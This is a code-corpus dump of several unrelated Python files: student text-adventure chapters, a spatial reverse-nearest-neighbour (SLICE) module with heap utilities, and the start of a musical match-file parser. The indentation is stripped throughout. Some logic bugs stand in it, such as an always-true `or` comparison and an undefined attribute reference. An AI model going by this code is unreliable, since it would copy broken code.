print("You have decided to run towards the dragon. The dragon scoffs and burns you to a crisp.")
dead = True
kill_if_dead(dead)
sleep(delay)
else:
pass
# Oh...Bad Choice
print("You reach the end of the cave uneventfully. Continue on!")
def team_8_adv():
"""
https://docs.google.com/document/d/1_Qj83TBpX5Doe6TMSEJ5TJ3kR8oNaE6qu6pPN4iCceA/edit?usp=sharing
:return:
"""
# TODO Add your code here
#######################################################################################
# eubanksn and mualcinp
# T04
# Fixing code
######################################################################################
# TODO Team 8
sleep(delay)
username = input("Who are you?")
print()
print("Thum.. Thum.. Thum.. You hear footsteps approaching.")
sleep(delay * 2)
print("Hello,", username, "I am the spirit of this cave. Here, take some food to help you with your journey.")
choice = input("Take the food? [yes/no]")
choice = choice.lower()
if choice == "yes":
print("You took the food and ate it. Now you have enough energy to continue on your journey.")
sleep(delay)
print("Congratulations! You made a wise choice.")
elif choice == "no":
second_choice = int(input(
"\nOkay, you don't have to eat all the food but you must take some bites. How many bites are you going to "
"take? [0-200]"))
while True:
if second_choice >= 0:
if second_choice > 100:
print("\nYou ate too much and exploded, you gluttonous fiend!")
deceased = True
break
elif second_choice == 0:
print("\nYou get hungry and your energy level drops. You pass out.")
deceased = True
break
elif 100 >= second_choice > 0:
print("\nYou took the food and ate it. Now, you have enough energy to continue on your journey.")
print("Congratulations! You made a wise choice.")
break
second_choice = int(input(
"That is not possible. Now, lets try again. How many bites would you like to take? Input a number from "
"0-200 this time. "))
else:
print("Enter either 'yes' or 'no'. The spirit of the cave would not take any other answers.")
if deceased:
print("A bear comes across your mangled, exploded body. You wake up dead.")
quit()
# TODO Don't forget to check if your user is dead at the end of your chapter!
def team_9_adv():
######################################################################
# Author: <NAME> & <NAME>
# Username: Wellst & Millerd2
#
# Assignment: T04: Adventure in Gitland
#
# Google docs: https://docs.google.com/document/d/1tQqF_Y0WmdpPVzTq3wAzf5_kX4x5tzHtdvdRv92qHp8/edit?usp=sharing
######################################################################
death = False
print("You see a dim light glowing behind a loose boulder. Do you choose to investigate?")
choice = input("[Yes/no/leave]")
sleep(delay)
if choice == "Yes":
print("You place your hand against the boulder and it dissipates into the air like fine mist. Behind it you")
print("see a giant sword bigger than most men.")
sleep(delay)
print("A giant humanoid creature enters your view and begins to grab the sword.")
sleep(delay * 2)
print("He swings the sword in your direction causing the timid ceiling to collapse in between you saving ")
print("yourself from the giant beast. ")
print("You are safe for now, and you begin to search for a way out..")
#
#
sleep(delay)
elif choice == "no":
print("You choose to hastily run away from the boulder and you begin to lose your footing.")
sleep(delay)
print("You trip and fall forward breaking your neck in the most boring possible fashion")
death = True
else:
print("You decide against your gut and move away from the glowing boulder.")
sleep(delay)
print("You leave the cave by following the sounds of wilderness outside. You begin to hear some disgruntled")
print("shuffling in the cave as you leave.")
kill_if_dead(death)
pass
def team_10_adv():
# Google Doc: https://docs.google.com/document/d/1XwjthTBbExLqfs_fXTbGp70kUGsyPTzwsMwP5XOjrJ4/edit?usp=sharing
# TODO Team 10
# Beginning of the Amulet Encounter Chapter
global dead
print()
print("You are in a room with strange symbols all over the walls.")
print("Looking at the eldritch markings makes your head hurt just by looking at them.")
print("You see an amulet floating in the middle of the room over a pedestal.")
print()
amuletAction = input("What do you want to do? [Wear/Ignore/Destroy]")
print()
if amuletAction == "Wear" or "wear" or "WEAR":
# Bad choice
print("Nothing happens... ")
sleep(delay * 3)
print("...")
sleep(delay * 3)
print("You feel strange, your hands starts twitching uncontrollably.")
print("You start walking back into the darkness, not in control of your own actions.")
# Begin Test of Wills
print()
print("You're body is under new management at the moment.")
print("The walls begin to morph, forming words you can comprehend, requesting a number.")
amuletSave = input("What is The Ultimate Answer to Life, The Universe and Everything?")
if int(amuletSave) == 42:
print()
print("Your body starts responding again.")
print("You seem to have shaken off the evil manipulation.")
print("Harrowed by your brush with death, you carry on, deeper into the labyrinth")
elif 41 <= int(amuletSave) <= 43:
print()
print("Close enough!")
print("You shake off the control with moments to spare and come to your senses.")
print("You twitch one last time and run for you life, towards (unlikely) safety...")
else:
print("INCORRECT MORTAL!!!")
print("NOW DIE FOR YOUR IGNORANCE!")
dead = True
elif amuletAction == "Destroy" or "destroy" or "DESTROY":
# Good option
print("As you cast the amulet into some previously un-narrated lava, you feel watched by a giant eye.")
print("As the amulet disintegrated, you feel a cursed being lifted from the Median-Earth.")
print("Satisfied with your good deed for the day you carry on deeper into the labyrinth...")
print()
elif amuletAction == "Ignore" or "ignore" or "IGNORE":
# Boring option
print("So you ignore the floating mystical artifact in the middle of the room.")
print(
"We went through all of the trouble in making a cool, levitating, magic item for you and you ignore it...")
print("Way to go, you hurt our creative pride.")
print("Well, I guess you can carry on, further deeper into the depths of the labyrinth...")
print("Away from anything fun...")
print()
else:
# Just in case option
print("Somehow, our scenario wasn't interesting enough for you to even answer properly.")
print("Whatever you just did somehow broke the laws of causality and you glitch")
print("through a lamp using a backwards long jump and end up in a parallel dimension in another room...")
print()
if dead == True:
print("Congratulations! You've been possessed by an ancient evil!")
print("Don't mess with cursed objects kids!")
print("Better luck next time! Try again by hitting the green play button in the top right. ")
kill_if_dead(dead)
print()
print()
def team_11_adv():
pass
# TODO Add your code here
# This is the start of team twelve's work.
def choosing(choice2):
""" this function present the user with the yes or no choice. Yes: progress, No:dead
"""
if choice2 == "yes":
print("Great you refilled your health ")
elif choice2 == "no":
print("you die from starvation?!")
sleep(delay)
kill_if_dead(True)
else:
# neutral choice
print("you later found berries in the dark hall")
def choosing1(choice3):
"""This function gives you two choices, one opens the door, the other is death
"""
if 0 < choice3 <= 10:
print("A door opens")
elif choice3 > 10:
print(" You fall to your death")
kill_if_dead(True)
def team_12_adv():
""" This is Imma and Sama's part of the adventure. Enjoy!
here's our google doc: https://docs.google.com/document/d/1vQBVi9MWeufUl-xCIQGYaNfP7oAsKXdWE0a3dMO0pmo/edit?usp=sharing
"""
# def choosing(choice):
# def dead():
# quit()
print("You walk into a room and see a glass of milk sitting on a table. Do you drink it?)")
choice1 = input("[yes/no] ")
choosing(choice1)
sleep(1)
print("In the dark hall you see a libra scale. You have to set the scale equal to a bar of silver.")
choice = int(input("Pick a number"))
choosing1(choice)
# TODO Don't forget to check if your user is dead at the end of your chapter!
#########################################################################################################
# TODO Add your code here
def team_13_adv():
sleep(delay * 3)
global dead
print("")
print("")
print("It seems like you will be here a while.")
print("You see two doors in front of you. One is made of wood. It looks like it is about to fall off.")
print("The other door is just plants. All you gotta do is walk through and you're on the other side. ")
print("There is also a doorway with no door. ")
choice = input("Where will you go? [Wood/Plant/No door] ")
if choice == "Wood":
print("As you push the door open, it falls off. ")
print("The loud noise wakes up the polar bear sleeping inside. It then proceeds to devour you with salt.")
dead = True
elif choice == "Plant":
print("You brush the plants to the side and walk through the doorway.")
print("This opens up a secret path. You follow this path for hours.")
print(" You somehow ended up at the same doorways that you encountered earlier.")
elif choice == "No door":
print(" You walk through the doorway and you see a faint light in the distance. You run to this light.")
print("You discover a chest. You open the chest and find food and water in the chest!.")
print("After eating, you continue to walk on and eventually find the Exit. ")
print("You are free!")
if dead:
print("You have been eaten by the polar bear!")
kill_if_dead(dead)
pass
# TODO Add your code here
####################################################################################################################
def team_14_adv():
"""
Google Drive: https://docs.google.com/document/d/1hVrBRHrbbXxCU74zEOyzQhHAzuYbB5O3eAddp6hoWnw/edit?usp=sharing
Partner 1: <NAME>
Partner 2: <NAME>
:return:
"""
global dead
print("\nYou stumble into the woods. \nThere are three paths in front of you.\n")
answer = input( "Which direction do you want to go? [North (N) /East (E) /West(W)] ")
if answer.lower() == "north" or answer.lower() == "n":
# Bad choice
print("\n You are being chased by wolves.")
sleep(1)
print("Try to run away! Good luck!")
sleep(1)
safe = input("How long do want to run? [1-10]")
try:
a = int(safe)
if int(safe) >= 7:
print("\nThe wolves get tired of chasing you.")
else:
print("Oh no. They caught you.")
except ValueError:
print("\nOh no. They caught you.")
dead = True
elif answer.lower() == "west" or answer.lower() =="w":
# Good choice
print("You stumbled into a clearing. \nYou escape the woods.")
elif answer.lower() == "east" or answer.lower() == "e":
# Neutral choice
print("The path leads you deeper into the woods. \nYou are now lost.")
else:
print("You can't think clearly. \nYou sit there for eternity.")
dead = True
if dead:
kill_if_dead(dead)
else:
print("Keep going. You are still alive.")
############################################################################################################
def team_15_adv():
"""
https://docs.google.com/document/d/1vE7M-wYzNrrqdWcMP472itZB_IBkW2anDfiU1cYA3Sk/edit?usp=sharing
:return:
"""
global dead
# TODO Add your code here
#########################################################################################################
# TODO Team 15
######################################################################
# Author: <NAME>, <NAME>
# Username: mastriyanag, AlexMeadors
#
# Assignment: T04: Adventure in Gitland
#
# Purpose: To recreate a choose-your-own-adventure style game
# by refactoring T01.
#
# Each "twist" in the story is from a different group. The resulting story
# will either be incoherently random, or entertainingly "Mad Lib" like.
# Either way, it should be fun!
#
# This new version will take advantage of functions, as well as
# demonstrate the value of git as a tool for collaborating.
######################################################################
# Acknowledgements:
# Original Author: <NAME>
#
######################################################################
messages = ["You come upon three doors.", "The one on the left has a light glowing from underneath.",
"The one in the middle looks old and cracked.", "The one on the right is made of rusted metal."]
for i in messages:
print(i)
sleep(delay * 3)
direction = input("Which door will you choose? [Left, Middle, Right]")
if direction.lower() == "right":
# Good choice
print(
"You can barely see because the room is so dark and dusty. "
"\nYou light your torch and see the room is filled to the brim with gold and jewels!.")
sleep(delay * 4)
print("Congratulations, you're rich!")
choice = 0
elif direction.lower() == "left":
# Worst choice
print(
"You step through the door onto a thin sheet of ice. Below the ice, electricity arcs from one "
"electric eel to another.\nYou turn quickly to walk back out the door and...")
sleep(delay * 3)
print("A golden dragon appears, he offers to help if and only if you can guess a number between 1 to 10")
number = input("What number do you choose?")
dragon_guess = False
for i in range(5):
if ord(number[0]) == (54 + i) or (ord(number[0]) == 49 and (ord(number[-1]) == 48) and (len(number) == 2)):
dragon_guess = True
if dragon_guess:
print("He offers you a ride to safety, you come out with no major injuries.")
choice = 2
# Death
else:
print("The ice breaks! You are electrocuted while you are drowned... ")
dead = True
choice = 1
else:
# Boring choice
messages = ["You open the middle door. Behind the door you find a long passage with stairs that seem to go up"
" forever.", "...", "....", ".....",
"You realize this tunnel is leading to nowhere and close your eyes, wishing for an escape."]
for i in messages:
print(i)
sleep(delay * 2)
choice = 2
choicestrings = ["You collect your treasure and you move on to the next part of the cave",
"You die, try again to test your fate again!",
"You open your eyes and you are in a new place. You are alive, but somewhat bored and disappointed."]
print(choicestrings[choice])
kill_if_dead(dead)
def check_if_exist(string):
"""
Checks to see if the direction the user chose exists, and if it does, continues the story line.
:param string:
"""
global dead
available_inputs = ["right", "left", "backwards", "forwards"] # Directions the user can choose
given_input = string.lower()
if given_input in available_inputs:
if given_input == "right":
# Good Choice!
print("You rush into the nearby trees for cover. There you find a mystical coconut that will slay the"
+ " dragon.")
sleep(delay)
elif given_input == "forwards":
# Bad Choice
# print("You almost made a bad choice! The dragon hasn't seen you yet! Pick a number.")
integer = int(
input(
"You have made a bad choice! You have one more chance to avoid being burnt alive. Pick a "
+ "number. [1,2]"))
if integer == 1:
print("You have saved yourself and spared yourself from the dragon!")
elif integer == 2:
print("You failed to make a better decision and gave the dragon time to get the BBQ sauce.")
print("You have decided to run towards the dragon. The dragon scoffs and burns you to a crisp.")
dead = True
sleep(delay * 2)
# Finished!
else:
# Oh...Bad Choice
print("You just got eaten by man-eating roaches!")
sleep(delay * 2)
print("Try to pick another direction to follow next time!")
dead = True
# Finished the user has died!
else:
print("I do not exist, choose another direction...")
ask()
def ask():
"""
asks a question about which direction the user wants to go
"""
x = input("Which direction would you like to go? [Right/Forwards/Backwards/Left]")
check_if_exist(x)
def team_16_adv():
######################################################################################################
# Author: <NAME> and <NAME>
# Username: garrettz and morenoa
# Assignment: T04_Adventures in Gitland
# Google Drive Link: smallyourl.appspot.com/B5odmlCDM
# Acknowledgements:
######################################################################################################
global dead # If user chooses wrong direction they will die
ask()
if dead:
print("Oh no! You died. Better luck next time! Try again by hitting the green play button.")
quit()
def team_17_adv():
pass
# TODO Add your code here
def team_18_adv():
pass
# TODO Add your code here
def team_19_adv():
pass
# TODO Add your code here
def team_20_adv():
pass
# TODO Add your code here
def main():
"""
The main function, where the program starts.
:return: None
"""
user = start_story()
paths = [scott_adventure, team_1_adv, team_2_adv,
team_3_adv, team_4_adv, team_5_adv,
team_6_adv, team_7_adv, team_8_adv,
team_9_adv, team_10_adv, team_11_adv,
team_12_adv, team_13_adv, team_14_adv,
team_15_adv, team_16_adv, team_17_adv,
team_18_adv, team_19_adv, team_20_adv]
random.shuffle(paths) # Shuffles the order of paths, so each adventure is different
for i in range(len(paths)):
paths[i]() # Runs each function in the paths list
end_story(user)
main()
``` |
{
"source": "2019ly/CSD",
"score": 3
} |
#### File: CSD/common/__init__.py
```python
from heapq import heappop, heappush, heappushpop, heapify, _heapify_max, _heappushpop_max, _siftdown_max, _siftup_max
from collections import Iterable
from math import cos, ceil, pi, sin
from shapely.geometry import Polygon, Point
def circle(o, r, resolution=None):
if r <= 0:
raise ValueError("r must be a number greater than 0")
if resolution:
return o.buffer(r, int(ceil(pi * r * 2 / resolution / 4)))
else:
return o.buffer(r, 32)
def sector(o, r, angles, resolution=None):
c = circle(o, r, resolution)
if abs(angles[0] - angles[1]) >= pi:
raise ValueError('abs(angles[0] - angles[1]) must be less than Pi')
l = r / cos(abs(angles[0] - angles[1]) / 2)
triangle = Polygon(
[(o.x, o.y), (o.x + cos(angles[0]) * l, o.y + sin(angles[0]) * l),
(o.x + cos(angles[1]) * l, o.y + sin(angles[1]) * l)])
s = triangle.intersection(c)
s.o = o
s.r = r
s.angles = angles
return s
def partitions(origin, space, n):
bounds = space.bounds
r = Point((bounds[0], bounds[1])).distance(Point((bounds[2], bounds[3])))
return [sector(origin, r, [2 * pi / n * i, 2 * pi / n * (i + 1)]) for i in range(n)]
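# Illustrative usage sketch (not part of the original module, values made up):
# `partitions` splits the space around an origin into n equal-angle sectors whose
# radius covers the whole bounding box of `space`.
# space = Polygon([(0, 0), (10, 0), (10, 10), (0, 10)])
# parts = partitions(Point(5, 5), space, 4)
# len(parts)  # -> 4 shapely polygons, one per 90-degree sector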
def heappush_max(heap, item):
heap.append(item)
_siftdown_max(heap, 0, len(heap) - 1)
def heappop_max(heap):
last = heap.pop()
if heap:
return_item = heap[0]
heap[0] = last
_siftup_max(heap, 0)
else:
return_item = last
return return_item
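# Note: heappush_max / heappop_max mirror heapq.heappush / heapq.heappop but
# maintain a max-heap, relying on the private CPython helpers _siftdown_max /
# _siftup_max imported above. Hypothetical example:
# h = []
# for x in (3, 1, 4, 1, 5): heappush_max(h, x)
# heappop_max(h)  # -> 5 (largest element comes out first)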
class MinHeap(Iterable):
def __init__(self):
self.items = []
def pop(self):
return heappop(self.items)
def push(self, item):
heappush(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
smallest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class MaxHeap(Iterable):
def __init__(self):
self.items = []
def pop(self):
return heappop_max(self.items)
def push(self, item):
heappush_max(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
largest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class NSmallestHolder:
def __init__(self, n):
self.items = []
self.n = n
def push(self, item):
if len(self.items) < self.n:
self.items.append(item)
if len(self.items) == self.n:
_heapify_max(self.items)
else:
_heappushpop_max(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
largest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
class NLargestHolder:
def __init__(self, n):
self.items = []
self.n = n
def push(self, item):
if len(self.items) < self.n:
self.items.append(item)
if len(self.items) == self.n:
heapify(self.items)
else:
heappushpop(self.items, item)
def first(self):
if len(self.items) > 0:
return self.items[0]
else:
return None
smallest = first
def __len__(self):
return len(self.items)
def __iter__(self):
for i in self.items:
yield i
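# NSmallestHolder / NLargestHolder keep only the n smallest (resp. largest)
# items pushed so far by holding them in a bounded heap. Illustrative sketch:
# holder = NSmallestHolder(3)
# for x in (5, 1, 4, 2, 8): holder.push(x)
# sorted(holder.items)  # -> [1, 2, 4]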
def plot_points(ax, data, color, size, label):
x = [geom.x for id, geom in data]
y = [geom.y for id, geom in data]
ax.plot(x, y, '.', markersize=size, color=color, label=label)
def plot_stars(ax, data, color, size, label):
x = [geom.x for id, geom in data]
y = [geom.y for id, geom in data]
ax.plot(x, y, '*', markersize=size, color=color, label=label)
```
#### File: CSD/RkNN/SLICE.py
```python
from math import cos, pi, sin, acos
from time import time
from numpy.linalg import norm
from shapely.geometry import Point
import numpy as np
from functools import reduce  # reduce() is used in pruning(); not a builtin on Python 3
import common
def MonoRkNN(q_id, k, index, with_statistics=False):
partition_num = 12
begin_time = time()
q = index.geometries[q_id]
sigLists, unpruned_area, pruning_io = pruning(q_id, q, k + 1, index, partition_num)
pruning_io += 1
pruning_time = time()
result, verification_io, candidate_num = mono_verification(q, k, sigLists, unpruned_area)
verification_time = time()
verified_candidate_num = candidate_num
if with_statistics:
return result, pruning_time - begin_time, verification_time - pruning_time, pruning_io, verification_io, candidate_num, verified_candidate_num
else:
return result
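# MonoRkNN / BiRkNN implement the SLICE reverse-k-nearest-neighbour query in two
# phases: a pruning phase that divides the space around the query point q into
# equal-angle partitions and collects "significant" facilities per partition
# (sigLists), and a verification phase that keeps a candidate only if fewer than
# k of those facilities are closer to it than q is. `index` is expected to expose
# `geometries`, `root` and `space` (an R-tree-like structure), as used below.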
def mono_verification(q, k, sigLists, unpruned_area):
result = list()
candidates, IO = mono_retrieve_candidates(sigLists, unpruned_area)
sigLists = [sorted(s, key=lambda c: c[0]) for s in sigLists]
for candidate in candidates:
if mono_is_RkNN(q, candidate[0], candidate[1], k, sigLists):
result.append(candidate)
return result, IO, len(candidates)
def mono_is_RkNN(q, candidate_id, candidate, k, sigLists):
i = sector_id(candidate, q, len(sigLists))
count = 0
sigList = sigLists[i]
for r_l, f_id, f in sigList:
if candidate_id == f_id:
continue
if candidate.distance(q) < r_l:
return True
if candidate.distance(f) < candidate.distance(q):
count += 1
if count >= k:
return False
return True
def mono_retrieve_candidates(sigLists, unpruned_area):
candidates = list()
visited = set()
for sigList in sigLists:
for r_l, f_id, f in sigList:
if f_id not in visited:
visited.add(f_id)
if unpruned_area.intersects(f):
candidates.append((f_id, f))
return candidates, 0
def BiRkNN(q_id, k, facility_index, user_index, with_statistics=False):
partition_num = 12
begin_time = time()
q = facility_index.geometries[q_id]
sigLists, unpruned_area, pruning_io = pruning(q_id, q, k, facility_index, partition_num)
pruning_io += 1
pruning_time = time()
result, verification_io, candidate_num = bi_verification(q, k, user_index, sigLists, unpruned_area)
verification_time = time()
verified_candidate_num = candidate_num
if with_statistics:
return result, pruning_time - begin_time, verification_time - pruning_time, pruning_io, verification_io, candidate_num, verified_candidate_num
else:
return result
def pruning(q_id, q, k, index, partition_num):
partitions = common.partitions(q, index.space, partition_num)
sigLists = [[] for i in range(partition_num)]
upper_arc_radius_heaps = [common.MaxHeap() for i in range(partition_num)]
shaded_areas = [calculate_shaded_area(partition, partition.r) for partition in partitions]
h = common.MinHeap()
IO = 0
h.push((0, index.root))
while len(h) > 0:
e_dist, e = h.pop()
if may_contains_significant_facility(e, shaded_areas):
if e.is_data_node:
pruneSpace(q_id, e, k, partitions, sigLists, upper_arc_radius_heaps, shaded_areas)
else:
for child in e.children:
h.push((child.geom.distance(q), child))
IO += 1
unpruned_area_list = list()
for i in range(partition_num):
r_b = min(upper_arc_radius_heaps[i].first(), partitions[i].r)
angles = [2 * pi / partition_num * i, 2 * pi / partition_num * (i + 1)]
if r_b > 0:
unpruned_area_list.append(common.sector(q, r_b, angles).buffer(0.01))
unpruned_area = reduce(lambda x, y: x.union(y), unpruned_area_list)
return sigLists, unpruned_area, IO
def pruneSpace(q_id, e, k, partitions, sigLists, upper_arc_radius_heaps, shaded_areas):
f_id = e.obj
if f_id == q_id:
return
f = e.geom
for i in range(len(partitions)):
partition = partitions[i]
sigList = sigLists[i]
upper_arc_radius_heap = upper_arc_radius_heaps[i]
min_angle, max_angle = min_and_max_angle(f, partition)
if min_angle < pi / 2:
r_l, r_u = lower_and_upper_arc_radius(f, partition)
bounding_arc_radius = float('inf')
if len(upper_arc_radius_heap) < k or r_u < upper_arc_radius_heap.first():
upper_arc_radius_heap.push(r_u)
if len(upper_arc_radius_heap) > k:
upper_arc_radius_heap.pop()
if len(upper_arc_radius_heap) == k:
bounding_arc_radius = upper_arc_radius_heap.first()
shaded_areas[i] = calculate_shaded_area(partition, bounding_arc_radius)
if is_significant_facility(f, partition, bounding_arc_radius):
sigList.append([r_l, f_id, f])
def bi_verification(q, k, index, sigLists, unpruned_area):
result = list()
candidates, IO = bi_retrieve_candidates(index, unpruned_area)
sigLists = [sorted(s, key=lambda c: c[0]) for s in sigLists]
for candidate in candidates:
if bi_is_RkNN(q, candidate[1], k, sigLists):
result.append(candidate)
return result, IO, len(candidates)
def bi_retrieve_candidates(index, unpruned_area):
candidates = list()
IO = 0
entries = {index.root}
IO += 1
while len(entries) > 0:
e = entries.pop()
if unpruned_area.intersects(e.geom):
if e.is_data_node:
candidates.append((e.obj, e.geom))
else:
for child in e.children:
entries.add(child)
IO += 1
return candidates, IO
def bi_is_RkNN(q, u, k, sigLists):
i = sector_id(u, q, len(sigLists))
count = 0
sigList = sigLists[i]
for r_l, f_id, f in sigList:
if u.distance(q) < r_l:
return True
if u.distance(f) < u.distance(q):
count += 1
if count >= k:
return False
return True
def is_significant_facility(f, partition, bounding_arc_radius):
if partition.contains(f):
if f.distance(partition.o) > 2 * bounding_arc_radius:
return False
else:
M, N = get_M_N(partition, bounding_arc_radius)
if M.distance(f) > bounding_arc_radius and N.distance(f) > bounding_arc_radius:
return False
return True
def may_contains_significant_facility(e, shaded_areas):
for area in shaded_areas:
if area.intersects(e.geom):
return True
return False
def calculate_shaded_area(partition, bounding_arc_radius):
if bounding_arc_radius == 0:
return partition.origin
if bounding_arc_radius == float('inf'):
bounding_arc_radius = partition.r
sector = common.sector(partition.o, bounding_arc_radius * 2, partition.angles)
m, n = get_M_N(partition, bounding_arc_radius)
circle_m = common.circle(m, bounding_arc_radius)
circle_n = common.circle(n, bounding_arc_radius)
return sector.union(circle_m).union(circle_n)
def get_M_N(partition, bounding_arc_radius):
o = partition.o
if bounding_arc_radius == float('inf'):
l = partition.r
else:
l = bounding_arc_radius
angles = partition.angles
M = Point(cos(angles[0]) * l + o.x, sin(angles[0]) * l + o.y)
N = Point(cos(angles[1]) * l + o.x, sin(angles[1]) * l + o.y)
return M, N
def min_and_max_angle(f, partition):
o = (partition.o.x, partition.o.y)
p1 = [o[0] + cos(partition.angles[0]), o[1] + sin(partition.angles[0])]
p2 = [o[0] + cos(partition.angles[1]), o[1] + sin(partition.angles[1])]
angles = [angle(o, p1, f), angle(o, p2, f)]
return sorted(angles)
def lower_and_upper_arc_radius(f, partition):
min_angle, max_angle = min_and_max_angle(f, partition)
dist_f_o = f.distance(partition.o)
if max_angle >= pi / 2:
r_u = float('inf')
else:
r_u = dist_f_o / (2 * cos(max_angle))
r_l = dist_f_o / (2 * cos(min_angle))
return r_l, r_u
def angle(o, x, y):
x = np.asarray(x)
y = np.asarray(y)
o = np.asarray(o)
vector_ox = x - o
vector_oy = y - o
norm_ox = norm(vector_ox)
norm_oy = norm(vector_oy)
if norm_ox == 0 or norm_oy == 0:
return 0
return acos(vector_ox.dot(vector_oy) / (norm_ox * norm_oy))
def sector_id(p, origin, sector_num):
return int(angle_with_x(origin, p) / (2 * pi / sector_num))
def angle_with_x(p_start, p_end):
dist = p_start.distance(p_end)
if dist == 0:
return 0
if p_end.y - p_start.y >= 0:
return acos((p_end.x - p_start.x) / dist)
else:
return 2 * pi - acos((p_end.x - p_start.x) / dist)
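# Small worked example (illustrative): the point (1, 1) seen from the origin lies
# at an angle of pi/4, so with 12 partitions it falls into sector 1, because
# int((pi/4) / (2*pi/12)) == 1.
# angle_with_x(Point(0, 0), Point(1, 1))  # ~0.785
# sector_id(Point(1, 1), Point(0, 0), 12)  # -> 1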
``` |
{
"source": "2019paper/Symbolic-Melody-Identification",
"score": 3
} |
#### File: extra/data_handling/matchfile.py
```python
import re
import operator
import numpy as np
import codecs
from ..utils.lang_utils import cached_property
####################################################################
rational_pattern = re.compile('^([0-9]+)/([0-9]+)$')
def interpret_field(data):
"""
Convert data to int, if not possible, to float, otherwise return
data itself.
:param data: some data object
:returns: an int, a float, or `data` unchanged
"""
try:
return int(data)
except ValueError:
try:
return float(data)
except ValueError:
return data
class ParseRationalException(Exception):
def __init__(self,string):
self.string = string
def __str__(self):
return 'Could not parse string "{0}"'.format(self.string)
class Ratio:
def __init__(self,string):
try:
self.numerator,self.denominator = [int(i) for i in string.split('/')]
except:
raise ParseRationalException(string)
def interpret_field_rational(data, allow_additions = False):
"""Convert data to int, if not possible, to float, if not possible
try to interpret as rational number and return it as float, if not
possible, return data itself."""
global rational_pattern
v = interpret_field(data)
if type(v) == str:
m = rational_pattern.match(v)
if m:
groups = m.groups()
return float(groups[0])/float(groups[1])
else:
if allow_additions:
parts = v.split('+')
if len(parts) > 1:
iparts = [interpret_field_rational(i, allow_additions = False) for i in parts]
# to be replaced with isinstance(i,numbers.Number)
if all(type(i) in (int, float) for i in iparts):
return sum(iparts)
else:
return v
else:
return v
else:
return v
else:
return v
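# Illustrative examples of the parsing helpers above (not part of the original file):
# interpret_field_rational('3/4')                          # -> 0.75
# interpret_field_rational('1/2+1/4', allow_additions=True)  # -> 0.75
# interpret_field_rational('abc')                           # -> 'abc' (unchanged)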
###################################################
def pitch_name_2_midi_PC(modifier, name, octave):
if name == 'r':
return (0, 0)
base_class = ({'c':0,'d':2,'e':4,'f':5,'g':7,'a':9,'b':11}[name.lower()] +
{'b':-1,'bb':-2,'#':1,'x':2,'##':2,'n':0}[modifier])
mid = (octave + 1) * 12 + base_class
#for mozartmatch files (in which the octave numbers are off by one)
#mid = octave*12 + base_class
pitchclass = base_class % 12
return (mid, pitchclass)
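# Example (illustrative): A4 with no accidental maps to MIDI note 69, pitch class 9;
# C#4 maps to MIDI note 61, pitch class 1.
# pitch_name_2_midi_PC('n', 'a', 4)  # -> (69, 9)
# pitch_name_2_midi_PC('#', 'c', 4)  # -> (61, 1)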
class MatchLine(object):
"""
A class that represents a line in a match file. It is intended
to be subclassed. It's constructor sets up a list of field names
as object attributes.
"""
field_names = []
re_obj = re.compile('')
def __str__(self):
r = [self.__class__.__name__]
for fn in self.field_names:
r.append(' {0}: {1}'.format(fn,self.__dict__[fn]))
return '\n'.join(r)+'\n'
def __init__(self, match_obj, field_interpreter = interpret_field_rational):
self.set_attributes(match_obj, field_interpreter)
@classmethod
def match_pattern(self,s, pos = 0):
"""
Return a regular expression match object that matches the
pattern to the given string, or None if no match was found
:param s: the string to be matched
:returns: match object, or None
"""
return self.re_obj.search(s, pos = pos)
def set_attributes(self, match_obj, field_interpreter = lambda x: x):
"""
Set attribute objects using values from a regular expression
match object; use `field_interpreter` to interpret the
attribute value strings as integers, floats, strings, etc.
:param match_obj: regular expression match object
:param field_interpreter: function that returns an object given a string
"""
groups = [field_interpreter(i) for i in match_obj.groups()]
if len(self.field_names) == len(groups):
for (a,v) in zip(self.field_names,groups):
setattr(self,a,v)
class UnknownMatchLine(MatchLine):
"""
A dummy class that represents a line that does not fit to any
specified pattern
"""
def __init__(self,line):
self.line = line
class Note(MatchLine):
"""
Class representing the played note part of a match line
"""
field_names = ['Number','NoteName','Modifier','Octave',
'Onset','Offset','AdjOffset','Velocity' ]
pattern = 'note\(([^,]+),\[([^,]+),([^,]+)\],([^,]+),([^,]+),([^,]+),([^,]+),([^,]+)\)'
re_obj = re.compile(pattern)
def __init__(self, m):
MatchLine.__init__(self, m)
self.MidiPitch = pitch_name_2_midi_PC(self.Modifier, self.NoteName, self.Octave)
class TrailingNoteLine(MatchLine):
"""
Class representing a Trailing Note line
"""
field_names = ['Number','NoteName','Modifier','Octave',
'Onset','Offset','AdjOffset','Velocity' ]
pattern = 'note\((.+),\[(.+),(.+)\],(.+),(.+),(.+),(.+),(.+)\)'
re_obj = re.compile(pattern)
def __init__(self, m):
self.note = Note(m)
class Snote(MatchLine):
"""
Class representing the score note part of a match line
"""
field_names = ['Anchor','NoteName','Modifier','Octave',
'Bar','Beat','Offset','Duration',
'OnsetInBeats','OffsetInBeats','ScoreAttributesList']
#pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)'
pattern = 'snote\(([^,]+),\[([^,]+),([^,]+)\],([^,]+),([^,]+):([^,]+),([^,]+),([^,]+),([^,]+),([^,]+),\[(.*)\]\)'
re_obj = re.compile(pattern)
def __init__(self, m = None):
if m != None:
MatchLine.__init__(self,m)
self.DurationSymbolic = m.groups()[7]
self.ScoreAttributesList = self.ScoreAttributesList.split(',')
@cached_property
def DurationInBeats(self):
return self.OffsetInBeats -self.OnsetInBeats
@cached_property
def MidiPitch(self):
return pitch_name_2_midi_PC(self.Modifier, self.NoteName, self.Octave)
class InfoLine(MatchLine):
"""
Class representing an Info line
"""
field_names = ['Attribute','Value']
pattern = 'info\(\s*([^,]+)\s*,\s*(.+)\s*\)\.'
re_obj = re.compile(pattern)
class MetaLine(MatchLine):
"""
Class representing a Meta line
"""
field_names = ['Attribute','Value','Bar','TimeInBeats']
pattern = 'meta\(\s*([^,]*)\s*,\s*([^,]*)\s*,\s*([^,]*)\s*,\s*([^,]*)\s*\)\.'
re_obj = re.compile(pattern)
class SustainPedalLine(MatchLine):
"""
Class representing a sustain pedal line
"""
field_names = ['Time','Value']
